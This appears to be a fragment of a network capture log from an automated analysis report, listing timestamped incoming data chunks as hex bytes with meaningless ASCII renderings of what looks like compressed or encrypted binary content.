                                                                                                                                                            2022-09-29 12:45:15 UTC21445INData Raw: b7 63 7f 8f 04 88 7f 44 fe 5f 3e 4b bb f5 eb 52 1f 8b 5e ec a8 a2 0f 60 04 c8 ab 82 b9 9a 61 29 78 1e f5 a1 ce e7 3a f9 40 47 12 d3 e1 6c f1 1b ab 72 99 9d c4 e0 a7 37 0d 9e c8 13 31 22 c2 b1 e0 a6 e5 43 9c 6e 3c 1d f7 6f a9 9e da 37 ff 0a 7d d1 57 9d 19 62 11 09 12 e8 b3 b4 7c e5 4b 4b 98 22 59 61 77 3c 3e e5 58 71 04 94 e2 a6 87 5f 9b d1 05 e5 06 cb a1 22 3c b5 79 f4 fc d7 c4 91 da 74 8a 4a 55 a5 ad d9 5b 6d cd 91 1b b0 76 70 05 47 aa 99 63 a5 3d e2 49 7c e4 4e 3b 7d cf f0 53 24 5c 77 cf 7b 1e 60 23 2d 1f 84 60 c0 d4 3d 0a 21 30 fc f4 2e 0a 9b b8 87 73 2d b3 e8 e3 24 f7 82 ad 26 25 e8 cb 1c ed 97 00 bb db 35 d6 5d f0 58 69 77 2d ed bf 83 30 76 42 6f 42 8d 51 a1 77 ee 19 4f 7b 20 d8 8b a0 62 f9 19 1e e5 a6 4f 35 31 75 2b 16 11 aa 9b cf 89 e2 b8 45 4a ea
                                                                                                                                                            Data Ascii: cD_>KR^`a)x:@Glr71"Cn<o7}Wb|KK"Yaw<>Xq_"<ytJU[mvpGc=I|N;}S$\w{`#-`=!0.s-$&%5]Xiw-0vBoBQwO{ bO51u+EJ
                                                                                                                                                            2022-09-29 12:45:15 UTC21461INData Raw: 65 d0 91 1e 2d 35 a1 24 1a 23 c7 7a c6 fd 2d 8d f6 dd 53 6c 2a 77 f2 29 c6 4d 7a 4e f5 b7 f5 b9 ea a3 25 9f 2c c8 48 c0 a7 12 d4 6d fe e4 7e 26 5d f9 eb 9e d4 d3 50 5f 7d 95 3a e8 80 0c b7 20 07 72 e8 d5 b0 f9 60 9e 24 4c 4d 38 76 1c 8d a2 16 65 d5 b7 46 1c b5 75 10 63 23 8c 25 d0 b7 b1 41 e3 20 26 4a a6 6d 8e 8f 3c ae 20 8f 97 16 3b e8 9a 77 b3 3b bc f3 42 89 16 b9 32 56 18 82 08 1a 57 50 5b 4e b7 00 8f 2b 8f 79 17 cb ca d0 0e 92 fe 1b d0 7e 76 e7 40 26 1b 10 71 48 2f 84 ba 8e d4 e3 ec 7c 71 ca ac c9 ed ac 85 09 bd bb bd fa d4 73 15 ce 72 b0 b1 5d 57 3e bf 83 e2 f2 ba 54 ec 3f d5 9c 1c c6 d6 d3 d8 15 f3 1d b7 0f e9 a8 66 17 a8 2f 8d 67 5a b5 af af bd 7c b2 2c 03 e8 83 7b b3 29 7b 6f 5b 81 40 38 85 2d 91 f8 ac ed 0c 06 31 c2 51 1a da d7 b7 38 e1 42 ba 3a
                                                                                                                                                            Data Ascii: e-5$#z-Sl*w)MzN%,Hm~&]P_}: r`$LM8veFuc#%A &Jm< ;w;B2VWP[N+y~v@&qH/|qsr]W>T?f/gZ|,{){o[@8-1Q8B:
                                                                                                                                                            2022-09-29 12:45:15 UTC21477INData Raw: 54 1c dd 97 ac 41 72 43 33 eb d2 aa 0a e8 0c 9b cd 15 01 3f 46 b6 a4 30 f1 de e5 c7 de 4b 1a 7b af bf 6c 3b 1e fb 3d 12 0c ae a2 17 8b 42 68 f1 3f 28 52 ec b4 6c 89 90 83 c8 5a bb 10 bf 65 97 ad 18 fc ac c9 8b 7f 41 27 8d b1 79 8c 6d b3 8c 63 a2 76 cc 4a 17 f4 87 04 7a 60 f5 46 f7 db b8 7f 34 ca b3 f1 60 af 00 fc b9 59 5e f5 0c ed 5f 35 a1 86 a3 19 7d 46 3a 04 7f 40 8e 98 99 ab 3e 86 22 7a 42 23 73 45 6c 1f 3f c4 7a 35 7f 3c e1 7f da ae 3f 34 d3 1c 82 89 08 3b a6 cd 69 10 35 14 08 1b ea 0d fa 19 b3 de b7 37 07 10 4e fb 55 42 76 ec 93 de 8e 87 ed cd 82 85 58 64 3b 17 e8 b9 e3 f2 6a 53 9e 38 c2 0e 2d 73 af 56 92 1e 83 65 3e 6d 29 2e 5b 1f 3f 1a 9c c0 de ed e0 6f 91 25 75 b9 c4 e6 da d3 b4 77 40 94 7f df 49 30 06 f6 93 1a b7 da 51 93 30 10 00 11 8e 4e a0 b4
                                                                                                                                                            Data Ascii: TArC3?F0K{l;=Bh?(RlZeA'ymcvJz`F4`Y^_5}F:@>"zB#sEl?z5<?4;i57NUBvXd;jS8-sVe>m).[?o%uw@I0Q0N
                                                                                                                                                            2022-09-29 12:45:15 UTC21493INData Raw: b8 6b 65 f3 c0 56 18 4e d1 54 e8 0e 6c 32 b8 4f b8 95 6d 0b a0 3d 80 87 07 9f 9d c4 29 39 27 b2 2d e3 dd 9b 9d f4 55 2e 74 ca 0c 4d 5c 50 b8 a2 86 40 f7 d5 d6 e4 33 a3 ef 06 af f9 ae 12 93 7a db c3 50 8a 0e 40 70 ed 7c 7b 8a 7a 20 81 3f 5a 34 6e f3 92 17 f8 6b c6 5c 78 10 bd cd 32 62 60 8e 93 44 dc 9d 65 ae 6c f1 8b a5 93 cc 10 3c b9 fe c7 48 44 ee e4 2c fb e5 a7 06 72 36 b0 0b d6 57 e0 38 53 0e 79 ce 4f 99 6e 7b f4 ef f7 c3 3e 6a 75 e5 b6 f1 b3 6d c0 1a cf cd 31 a3 60 0b 49 df bb 9d 87 97 5f f1 5c d3 31 26 ed 90 9f 56 04 20 e7 83 76 f5 8e b5 62 36 ab d9 e0 e0 85 fc e9 34 2e 5e fa 6f 70 df ca 6c e2 6c ae 51 b7 ce b7 9d 49 6b 1a 80 12 4f 8d 84 57 16 86 88 e5 1f a8 cf ac 17 f1 0c 53 35 62 32 54 f5 0d 3a 8f bd 46 60 ae 10 e6 90 75 b8 73 40 83 73 ad 78 f7 28
                                                                                                                                                            Data Ascii: keVNTl2Om=)9'-U.tM\P@3zP@p|{z ?Z4nk\x2b`Del<HD,r6W8SyOn{>jum1`I_\1&V vb64.^opllQIkOWS5b2T:F`us@sx(
                                                                                                                                                            2022-09-29 12:45:15 UTC21509INData Raw: 7a 4a dc 25 86 5a 44 06 87 7e 30 3c 7f 97 f7 ae 5f c1 69 c4 99 39 9b 0c 80 3a 69 e6 4d 4b d2 08 34 c4 d7 a4 98 ad 3b b5 ca cb 8e fe ef 07 eb 6a 7c c4 57 27 0f 86 01 29 ce 69 38 cf 19 e7 95 a2 2e 4f 5c 3b 3d 3d f4 60 47 70 e9 e8 a4 5d 0e d5 71 5e 63 69 d3 1e 3a ba 14 9e 62 2a 5d fd f2 12 bc 71 5e 0a 16 be 35 e1 01 6c 05 38 9a 34 31 83 d6 e2 80 cc 57 62 dd 26 27 09 00 76 43 55 27 be b5 eb 09 72 57 19 a7 b9 08 54 b0 2b 71 49 b4 66 8c f4 38 93 c4 51 d2 07 21 c4 95 e0 05 ac 50 29 db 8f c4 ec 30 4c db 35 eb 20 72 ca 23 a4 24 60 7e a1 8a 1e 15 ef c2 2b 35 91 97 43 2e 12 ad 10 06 89 91 dd 4c 25 e5 bf 6f 78 dc 6a 54 91 9f e2 cb a3 7f 82 98 9e c9 29 4e ef 96 05 9c a8 52 44 4c c9 77 34 ac 11 8d 8e e3 ca c7 ea 19 84 19 f6 32 76 ff 3a 70 04 0b 01 9a aa a0 61 02 4c b9
                                                                                                                                                            Data Ascii: zJ%ZD~0<_i9:iMK4;j|W')i8.O\;==`Gp]q^ci:b*]q^5l841Wb&'vCU'rWT+qIf8Q!P)0L5 r#$`~+5C.L%oxjT)NRDLw42v:paL
                                                                                                                                                            2022-09-29 12:45:15 UTC21525INData Raw: e5 25 37 5a f2 29 8a 72 b0 29 22 1c 7c f5 28 77 9e e5 cc 6d ff 7e 8e ff 11 f4 24 1a 1d 7b da 59 a7 18 ad 43 59 13 67 c1 e0 48 b0 17 01 91 4d cc fe e2 33 a5 90 33 50 2e b6 74 7e 2a 85 dc 9e 26 bd 9c fe 39 86 77 90 ef f2 69 2a 3c 81 51 63 09 50 a5 5a 57 be db cb 59 71 4d b5 92 e6 4f 72 f0 ca bf 58 f1 45 c4 c2 42 25 eb 24 ba 99 8f 36 2c a6 68 63 75 4b aa 03 03 b6 a8 00 db ee 24 48 87 9d e0 ed d9 74 3a a2 55 25 97 8b c8 d8 7b a4 db 1d 89 8d f0 4e 72 c0 90 5f f9 a2 8d e2 58 82 86 5d b6 c1 8a 88 43 61 5c 16 4c 6f fc 27 5c 1e 93 f0 b5 73 a9 2f 2c 13 5c 3f e7 eb f3 0a b2 66 ac 33 f1 5f 8d a9 56 76 1d 06 60 ce bb 40 df b2 9d 90 d9 b6 7d 44 01 98 c9 82 ae ca 8d 2e 15 6d 2c 68 d1 f9 31 c3 e7 90 95 53 3a 90 17 a4 96 e7 c7 a7 bc 9e 76 33 c2 f6 2c 41 63 1b 29 e7 9c 2a
                                                                                                                                                            Data Ascii: %7Z)r)"|(wm~${YCYgHM33P.t~*&9wi*<QcPZWYqMOrXEB%$6,hcuK$Ht:U%{Nr_X]Ca\Lo'\s/,\?f3_Vv`@}D.m,h1S:v3,Ac)*
                                                                                                                                                            2022-09-29 12:45:15 UTC21541INData Raw: 2d f3 4a b8 09 fe 4d 44 14 bf af da 26 0e f7 e4 01 ee 15 94 5f 96 35 c6 51 ee a3 e1 a6 c3 f5 79 f0 12 17 0a 4a eb cd fe e8 e0 f6 4d be 5c 4a 81 28 87 38 77 53 e9 2d 86 dc 3d b0 6f 50 77 34 f5 fe 53 15 7f e3 30 0c 25 5d f7 17 5b 95 85 e5 a6 02 15 30 32 c7 20 30 5c cb 6b 3c 57 a1 60 d9 97 62 bd 16 71 17 23 5b 53 a7 6f ca e4 d3 05 af 50 45 cd e7 db 67 3d 3f 5a 4f 89 83 e2 b3 47 b1 a9 25 c8 0f 2f f8 c7 5b e3 1d 1a 16 40 5f 3c 6d 3b eb 77 50 36 bc 68 3f 07 4b 22 81 15 31 5a c2 f5 7c b9 08 9b 8a 50 c8 77 81 b7 c0 ee 31 86 8b 90 a2 30 5d 27 05 e2 03 1c 3f b8 bc 30 bd 35 c9 60 39 05 df 5b 71 d1 e0 38 26 65 f7 b8 19 19 49 18 12 c1 df dc 2c 7f bc 0c 86 9b 62 c0 f0 06 07 00 22 72 a0 0b a4 8a bb d7 1f 0e 76 0e 54 6f 21 3f 6f 8f 60 a4 91 ff ae 35 a1 81 9d 02 fe 53 d1
                                                                                                                                                            Data Ascii: -JMD&_5QyJM\J(8wS-=oPw4S0%][02 0\k<W`bq#[SoPEg=?ZOG%/[@_<m;wP6h?K"1Z|Pw10]'?05`9[q8&eI,b"rvTo!?o`5S
                                                                                                                                                            2022-09-29 12:45:15 UTC21557INData Raw: bb b5 8f 28 3e 4b 96 29 e5 de 44 bc a2 50 8c b5 15 41 1d 47 54 5e 39 c2 a7 fc 5b ab 8b 4e ee b1 2c f6 c0 ef 4a 68 4c 3e 35 15 d2 33 66 9b 5b 2f 5b 95 65 ed 94 54 77 08 8c 10 49 fd fb b3 05 2e 7f 20 6f 7c ec 25 7d 6e 44 78 ad f3 47 e2 16 d3 de 22 dd 11 d9 a2 af c3 eb 98 97 17 a1 cd 3d 7d e9 03 7a c7 b5 9e 21 5f c2 9b 68 33 ae 94 a9 9c 87 b6 f7 d5 74 a0 e7 30 1e 56 b4 f5 32 dc f6 9f 4c c3 f7 58 62 2f f3 8b 83 6a 01 4e 9c 91 4a b8 a2 84 14 e9 5b 40 cb b4 55 1e 27 e3 c6 09 c0 51 0d b8 4d 7a b2 d6 26 49 c5 a7 66 60 42 36 f2 4e d4 28 49 51 b1 c6 d1 b8 90 8d 88 89 d1 b3 7c 71 4b 38 1f aa 06 de 32 77 e7 02 c7 2a 8a 37 c9 20 eb b0 06 a0 9d 42 67 fd 0f 70 9f 01 d7 42 83 b5 47 ad 31 5e 64 10 e5 e2 a6 ee 5e 9b 28 2c 56 a5 c1 32 81 8d 8f 4b f4 b3 72 0b 27 5b 95 72 bd
                                                                                                                                                            Data Ascii: (>K)DPAGT^9[N,JhL>53f[/[eTwI. o|%}nDxG"=}z!_h3t0V2LXb/jNJ[@U'QMz&If`B6N(IQ|qK82w*7 BgpBG1^d^(,V2Kr'[r
                                                                                                                                                            2022-09-29 12:45:15 UTC21573INData Raw: 7b e5 35 29 04 d8 e0 f2 c8 0f ff 33 8a 31 bd c2 72 53 71 f1 b9 c4 fe c2 25 c8 cd 57 21 d3 e3 6f 11 42 47 bc 1a 5f 05 22 6f 13 5e d6 40 5d 4d 2f 66 b0 54 b5 bb 50 3d 9f 4f c2 bf 6b 38 32 c6 f0 fa 23 de 5c 43 a2 85 65 c2 f4 9b 0e 6a 36 09 d4 5c 53 e5 e1 05 b3 3b 10 02 6e e1 a4 8e b5 b2 11 ab e8 54 e1 45 9a 7c 27 18 b2 54 9d f6 a2 eb 66 4e 74 00 93 1a 6e 53 d5 80 ef e7 79 a9 00 bb 4c 7c 4d 93 67 2d b8 9f 82 b8 bd 40 03 1f 1c 25 fa b2 75 c7 bd 98 05 db c3 10 18 8e a2 d4 bd 4c d4 d0 39 ae b0 8c 8d 7e c7 7b fb da ca 86 f3 c4 03 96 e1 c2 e8 3f fa ef df 1a a5 aa ba b1 ea 3f be 1f a4 86 bb 36 20 82 a1 ec 40 36 c8 07 c8 10 6b ee af 47 fb 59 0b 29 48 4f d9 e0 83 a4 53 7e fb 44 30 ed 5b c4 22 b3 5c 65 2a 0d ff 73 b1 ac 4f 83 14 fc 1d e7 37 20 83 30 82 c9 77 e2 67 66
                                                                                                                                                            Data Ascii: {5)31rSq%W!oBG_"o^@]M/fTP=Ok82#\Cej6\S;nTE|'TfNtnSyL|Mg-@%uL9~{??6 @6kGY)HOS~D0["\e*sO7 0wgf
                                                                                                                                                            2022-09-29 12:45:15 UTC21589INData Raw: 08 b6 75 36 56 8f 54 1d dd 13 cc 5d 5c 6d a1 16 9d 79 d0 01 9b d5 26 a7 34 3a 94 28 aa d7 81 1b 94 96 13 f0 43 03 66 ad 8a 8e 15 65 57 69 6c f9 7a 05 10 f2 5e 95 a5 ce 27 c9 ce 29 a1 17 ae 07 bf 5f a8 83 a3 a3 08 03 db ef d4 72 9f 60 fa 35 e0 a0 14 f4 b4 9b d4 54 5d 50 d2 38 48 e0 53 ae 9d 2c bf 0f e0 da e0 c7 aa 1f 05 98 eb be 60 12 4e 82 e2 80 ea e6 b4 4f 16 17 9d e2 ac 4e cc fa 42 0f 7e 49 55 81 e6 2c 07 c2 b4 fb 4b 01 61 ee 46 01 97 c6 67 37 fe 2c be 15 91 ed 80 95 57 ef ef ad f0 4d 1b ad 3c 63 ba 12 68 47 67 b7 93 23 d8 15 be 25 81 9d 95 c9 6c a3 a5 07 d0 be 80 a4 fb d4 98 be a4 8b 7c a6 db 6d b1 f1 1a f8 1a d2 29 3d ea fb 18 bf c8 0f e4 e6 7a df 0b 7f 08 79 8a f7 55 1e b6 c4 70 19 61 35 99 3e f4 ae a4 d8 52 b3 e7 14 d9 72 61 f4 fe af 4f cb 97 47 bb
                                                                                                                                                            Data Ascii: u6VT]\my&4:(CfeWilz^')_r`5T]P8HS,`NONB~IU,KaFg7,WM<chGg#%l|m)=zyUpa5>RraOG
                                                                                                                                                            2022-09-29 12:45:15 UTC21605INData Raw: 66 1e 85 71 ba d5 1e 1c 09 e7 23 3f 53 df 8c 19 21 6d 9f d1 d1 26 26 9d 3f 5b f1 43 92 74 be 12 47 b6 b8 ef 7e 28 15 7f ee d5 9c 01 49 b9 90 81 93 50 1d 82 73 7e d6 8f ed e9 c9 3a 4b 1e 5d 9d 5b ad 93 28 32 bc bf ce 1d 4f 9c 05 08 81 01 b8 6e 4c f3 dd 93 6b b2 b6 29 67 3c 4b cb 76 5e 39 ad 94 34 e2 de c9 80 5a 05 af 52 0f b1 00 82 3d 7b e0 7a ac 7f ca af 0f da e8 a9 46 53 21 14 e4 12 f5 74 99 d7 d6 94 d9 92 f0 a7 13 6c ae fe b4 ef 55 16 1c 74 49 16 f1 79 cf d9 83 9b 78 4a 2b be 83 df 3a 7b d6 37 24 83 72 a8 54 d6 f2 0c 36 f4 23 3c f8 ba 84 54 d6 4b 57 9b 88 60 3e 7f e7 51 2a 8c 2b 6c db af fc e7 9d 5c 79 03 07 ea 1f c3 9c dc 9d 8f 05 f9 0e 34 ff e2 70 ae c2 43 4d 27 67 e6 9c 78 ee fc b2 25 b1 95 4a e3 60 b4 ce 4a 30 40 9e bd 6f 26 f4 13 b1 04 ae 5b 90 21
                                                                                                                                                            Data Ascii: fq#?S!m&&?[CtG~(IPs~:K][(2OnLk)g<Kv^94ZR={zFS!tlUtIyxJ+:{7$rT6#<TKW`>Q*+l\y4pCM'gx%J`J0@o&[!
                                                                                                                                                            2022-09-29 12:45:15 UTC21621INData Raw: 9b e3 99 8c f1 64 b5 80 64 67 05 20 79 5d 95 9b 8e 09 3c 18 33 10 16 8f b1 91 a4 8a a3 5c 31 a8 35 e3 33 8a 4f 02 eb b8 75 3f af f3 78 9a b4 7b ed 26 50 ab 95 b9 2b 8e f3 ce 81 05 ba 19 1b 63 af de c3 b4 7f 31 05 62 da fd 01 3a 42 94 a5 4d fe 98 6c fd 5d 99 aa e4 67 8e f9 d8 17 62 55 e2 15 f0 92 7e b2 d2 80 92 8e 0c b0 25 29 f6 76 12 89 83 dd 94 aa af 13 84 14 0a 8a 05 59 18 78 b6 f1 02 55 17 bd dd 21 a2 e2 df f8 7e 37 a5 b4 d9 53 53 02 ac 10 06 ee 59 77 a3 47 ac ab e1 b0 3b 72 c1 b4 19 cb 63 9f f3 40 ca 13 4f 9b 5a 9d 76 f1 89 4a db 62 ce 2e fb dd f7 d6 6e 59 74 1c 09 6f e7 50 6c 08 75 b2 7a 54 f8 5c a8 e9 37 cc 87 07 81 53 d3 8b 4a de 91 9f 51 8b 2d 4f 4a a1 26 1d d9 76 c9 81 93 87 cd 7f e6 96 f1 ec b5 e9 54 e0 24 df 2e 24 69 9e b1 8b 47 1f c7 24 88 3c
                                                                                                                                                            Data Ascii: ddg y]<3\153Ou?x{&P+c1b:BMl]gbU~%)vYxU!~7SSYwG;rc@OZvJb.nYtoPluzT\7SJQ-OJ&vT$.$iG$<
                                                                                                                                                            2022-09-29 12:45:15 UTC21637INData Raw: 0b 86 d4 41 10 0a 59 da cc 01 fb 75 ee 2b 5d f1 fe f0 b2 18 af c7 fc 63 c5 9a c8 f0 75 c4 ef 09 47 8f 41 4f c6 20 08 85 76 51 77 ca 1f aa 5c 96 b7 a0 c5 b7 9f 95 1c e7 1c 36 1b f3 8a 2b ae d0 69 39 d5 cd 21 9c 3b 84 e2 fa 1d e6 fe 6d 11 47 08 65 ac 70 5a 3c b8 bd 26 ba 73 2f 3c 37 3d 09 88 ab c2 8a c4 02 6d 4f 84 4b 46 6e 98 84 ba ee 7e d3 ee 53 44 a3 68 03 5c ed dd aa c4 24 a9 14 fe 19 d3 5f bc 67 06 81 f9 ed fd a0 de 0a 71 8e 31 df 83 1e e9 05 59 b6 b6 a7 28 d2 e2 d3 63 80 44 d9 5d b0 75 09 d1 7d 73 95 a8 65 e0 9b a3 94 31 a3 9d 23 d7 b3 b5 f3 f8 4d d3 d9 f3 da 01 87 d6 41 04 78 39 a8 02 98 41 77 15 e6 36 61 9e 1d 45 fb d9 11 3c 05 4c 6b af 27 5e 1b cb a9 28 fd f7 bb 8b 4e f3 b0 fe c3 94 1b 22 a8 f2 fb 61 95 9d 6a f8 b8 34 ee 5e a1 c0 db 88 8f 9c 1d 4d
                                                                                                                                                            Data Ascii: AYu+]cuGAO vQw\6+i9!;mGepZ<&s/<7=mOKFn~SDh\$_gq1Y(cD]u}se1#MAx9Aw6aE<Lk'^(N"aj4^M
                                                                                                                                                            2022-09-29 12:45:15 UTC21653INData Raw: e1 8a 40 72 66 5e 0f 10 6a 91 2c 05 7f ef 4c cc dd 0f 40 3d 33 7c 4c 07 84 7b db 41 3c 6c 2c 19 c4 70 d8 dc aa 89 58 ff c2 cd 71 66 8b 14 06 d2 2a 16 a5 05 e3 9c 40 04 39 f6 5c f7 bd dc 0c 46 41 84 b1 ee 19 6d 1e f6 63 2a 0d f2 2f ec 8d 84 42 f9 1e 78 46 9a 1c 2c 72 04 4e 8c bb e2 17 d4 e1 e8 d1 e5 ac 79 47 37 27 4e 44 1e 68 0f d8 60 da 70 34 62 89 53 61 8f e9 4b 2d fa 16 ce 88 c9 d5 f8 db ca 00 27 70 48 60 5d 5b 3e 67 cb 4d ec 8f 0e a6 19 8c 88 3e 72 25 c8 c4 db d5 21 9c 9f 6a 3b 9c 00 15 cb c1 bf fe 2c 98 90 96 dc 4c 17 e5 75 d4 8c 47 eb 9f ea e0 29 65 b6 9a 82 db 8f 0b 39 2f 41 61 58 3f 75 7e c9 14 fa 1d f2 26 de c5 27 26 91 26 d7 b0 e5 f7 e6 a2 a3 b3 72 ff 97 20 3e 03 e0 7f 83 58 13 b9 44 59 88 76 29 53 5e 61 55 40 91 4e ff 04 79 8c cb 58 c7 ad b4 32
                                                                                                                                                            Data Ascii: @rf^j,L@=3|L{A<l,pXqf*@9\FAmc*/BxF,rNyG7'NDh`p4bSaK-'pH`][>gM>r%!j;,LuG)e9/AaX?u~&'&&r >XDYv)S^aU@NyX2
                                                                                                                                                            2022-09-29 12:45:15 UTC21669INData Raw: 0d 16 c6 83 53 f1 d9 b9 1a 5a db a5 dc 43 52 16 72 66 13 00 b2 11 ef 6a 9e be 11 c9 15 4d ae f5 f0 fd c5 2e 62 85 9a 8c 87 24 a4 f5 59 16 4b 4e 39 cd b8 80 72 f0 4d 31 03 80 85 7b bc c0 1a bc 8f e9 b1 cf 30 0e 0e a1 62 6a 67 6d aa 0d 78 5a 25 07 16 55 d4 36 76 18 6e c5 26 2f 90 2b f2 56 38 3d eb 1d de f1 61 d3 20 34 e7 d0 65 45 d1 e6 ea 51 a3 09 ca 1e 28 4b 9c bf d0 a3 f9 ac d1 e9 c4 69 e8 90 36 3e 81 9f 6c c4 67 33 c6 dd 68 6b 3c f6 27 8b 4e d7 9c 06 b0 73 3f c8 09 04 29 2d b7 fe 55 17 7c 32 b1 05 d9 3d 51 53 b0 5f 59 0d 72 21 30 ff b6 6f bc 27 1b 5b 9d b8 3d 53 cd 65 6e 93 a4 ae cc ed e2 9f f0 62 b2 85 b0 f5 74 9b 35 59 33 d9 ee e2 82 a9 cd a4 13 32 e3 4e b2 1f 1a d8 be 84 2c bc 10 1c 50 5b e0 37 eb 2f 94 15 cd 2a 75 d5 58 a1 a6 88 c0 f0 8d 80 84 e5 96
                                                                                                                                                            Data Ascii: SZCRrfjM.b$YKN9rM1{0bjgmxZ%U6vn&/+V8=a 4eEQ(Ki6>lg3hk<'Ns?)-U|2=QS_Yr!0o'[=Senbt5Y32N,P[7/*uX
                                                                                                                                                            2022-09-29 12:45:15 UTC21685INData Raw: 55 1d 44 90 46 a3 2d 25 a1 cb fc ef 91 35 1a 20 60 69 4c 5d 93 bd 63 bf 78 3a 4a 4c 13 c0 5a a4 09 6e 49 e0 b7 1e f5 4e 10 0f cf 09 f3 c3 0b aa 92 e5 4e cc 08 58 68 10 46 41 18 6b 99 3b 26 fe fd 48 90 6c fe ec 62 20 f1 3e 23 2b 7c 93 93 3e d3 8d 5e e5 04 35 58 c8 3d 28 45 73 0a 46 5e 5b 6b ef ce c5 26 78 86 40 cb 02 24 78 8d 98 e9 a0 27 c6 c8 b3 27 4c 1b 27 3e 26 15 fd 35 dd 8e b8 3d 70 94 7b 29 95 34 3f a3 37 9b 42 52 7b c8 5c 34 bd 4c a6 ff 21 5f d9 a8 ef f7 65 96 63 60 c8 f6 fa a3 ba da 40 0d 5b 83 d7 71 1e 45 20 ed f5 ca df cb c6 c7 c7 71 04 84 1c bd cd 3e a1 29 10 01 2d e8 bb 26 d7 ed e0 74 61 9e 76 82 a4 a2 a3 f6 36 d1 e3 2f 4e ec 08 94 fe e6 57 6b 87 11 02 de b7 36 80 d3 1f c7 96 b7 dd 81 8b cd c5 5e 72 c4 4d ca a4 d5 7c bf 4a e2 c0 04 c1 6a 10 00
                                                                                                                                                            Data Ascii: UDF-%5 `iL]cx:JLZnINNXhFAk;&Hlb >#+|>^5X=(EsF^[k&x@$x''L'>&5=p{)4?7BR{\4L!_ec`@[qE q>)-&tav6/NWk6^rM|Jj
                                                                                                                                                            2022-09-29 12:45:15 UTC21701INData Raw: 6d b6 4c e7 f7 95 f0 27 7a 3c 6a 04 fa 84 79 8a 5b e8 fa 99 ba 1a 4c e7 ac 16 2b 0e f0 24 43 b8 eb 49 79 09 16 a0 4b e8 72 50 81 fd f1 57 98 53 10 71 35 39 17 05 70 cd 16 58 c3 45 e1 34 70 e7 b2 9d f4 00 cc 60 9a 5b 1f a2 47 cd 11 f5 14 d2 65 50 a2 f8 20 8d 8b 80 af f8 0b 6f 15 a4 22 a6 dc 54 f5 c4 ce 2c 89 06 2a fc 63 ae 82 8a c8 c0 dc 14 2d 09 f7 5d a7 61 12 f2 73 74 26 67 a9 79 7a 38 1c b1 70 78 55 35 ab a0 c6 48 e7 3f 2b 39 50 bc 04 50 a7 3d 0a a0 3e 15 d8 14 9f d6 16 f1 a1 37 86 55 35 91 ed e8 e3 9e 6e 69 3f cd 77 5b 5d 68 9b 2c bc b3 d7 45 b3 8e f2 02 02 c0 89 93 67 28 7f 65 3b a8 25 cc ab 44 ee 50 f5 8f 23 35 ec d6 3e d5 4e 5a e8 b3 0e ba 2c 32 d1 72 24 2c 1b 71 1c f6 90 cc 92 82 2b 46 1f 8f 9a 00 69 6c 12 41 62 ba f5 a3 ef 52 ed ab 4c 9b 68 a2 e2
                                                                                                                                                            Data Ascii: mL'z<jy[L+$CIyKrPWSq59pXE4p`[GeP o"T,*c-]ast&gyz8pxU5H?+9PP=>7U5ni?w[]h,Eg(e;%DP#5>NZ,2r$,q+FilAbRLh
                                                                                                                                                            2022-09-29 12:45:15 UTC21717INData Raw: 06 df 5a f9 8f b4 ef e6 c7 e6 a6 bc 91 ee d4 27 d2 00 84 55 47 6f a1 e1 12 81 0a 5f 38 61 e8 c8 8e ed 30 81 90 a5 eb ad 31 d5 11 40 58 42 6b 3e bd cb 64 a5 69 45 9a 1f 5b 85 79 08 44 b0 99 47 36 62 05 e4 80 95 98 34 46 ee 22 39 35 94 3d 88 44 1c 02 96 73 fa 73 40 e7 5d 3d 4d d3 0c b1 c6 b9 ec 23 5b 25 e3 2a c8 79 8e 84 39 5c e6 eb fe 2d 16 15 2a 84 ca 8b 0d 1c 78 f4 cc 6c 3e 31 ff b1 20 26 54 5a 1b 7c 3e 61 4c 96 ce 17 2c 91 d5 04 f3 c5 17 aa da 52 4c d7 ce 28 f4 db 20 b4 47 ce 4e 3b df 8e e3 df 79 d2 2f 1c 8f 30 7a b3 80 a7 91 0c f5 6b 44 71 f7 05 ff 4c 10 ea 9e 54 08 ec 95 e5 3c 9f 75 77 77 94 c9 a6 0e 27 1d 91 bc 03 44 79 9e ae db c6 43 5b fa 31 7d b2 e0 af 56 db e7 b5 86 83 06 e4 c1 7e c6 b5 6b 62 1a dd c5 0e 03 ec e8 98 8d 1d 0a 34 6f 4e c2 2f 59 54
                                                                                                                                                            Data Ascii: Z'UGo_8a01@XBk>diE[yDG6b4F"95=Dss@]=M#[%*y9\-*xl>1 &TZ|>aL,RL( GN;y/0zkDqLT<uww'DyC[1}V~kb4oN/YT
                                                                                                                                                            2022-09-29 12:45:15 UTC21733INData Raw: 14 48 32 52 12 19 14 f3 c9 08 6b 66 f5 c5 2b 4b c4 8f 98 7b eb 40 33 b5 51 d4 16 83 57 b3 d4 4c 44 c3 ba 7d 4a 59 c9 7d 08 34 95 fd f7 a9 f8 e2 4b 8c b7 52 75 bd c9 63 77 17 5d f7 56 3b b6 a8 bf da cb 5c ea dd 5d 90 4f 77 6d 89 8b 05 72 88 26 3d e3 1d 2f f6 40 48 aa bb 93 59 83 ce d6 5a 04 c6 c5 31 f8 8f 2c 9b ed 2f b1 8a c7 dc d7 69 61 85 ba 7d 15 a4 a9 20 cf c2 48 a2 06 f9 14 d8 ef e4 f1 8e 50 d8 15 07 cf dc 91 06 6c 4f 45 55 78 d9 ae f5 ae c5 6f b1 30 31 2a c7 99 a7 af 88 a9 bd 0f cc f6 66 bc 60 f3 25 b6 a4 ae 63 5b a8 8d c0 06 78 9d ce 63 aa 73 a1 53 ed 30 61 52 c1 84 8e f8 98 d2 6b f3 fa 5b 23 be b3 29 d7 ef fb c1 cb 76 69 11 f0 d3 09 6c d2 c7 2e c4 3c 45 2f c9 de 14 6a 81 5a 43 e8 0f a7 34 5b 93 7e 31 0d 54 66 2f f1 ad 62 70 32 14 42 8e d4 97 fb 71
                                                                                                                                                            Data Ascii: H2Rkf+K{@3QWLD}JY}4KRucw]V;\]Owmr&=/@HYZ1,/ia} HPlOEUxo01*f`%c[xcsS0aRk[#)vil.<E/jZC4[~1Tf/bp2Bq
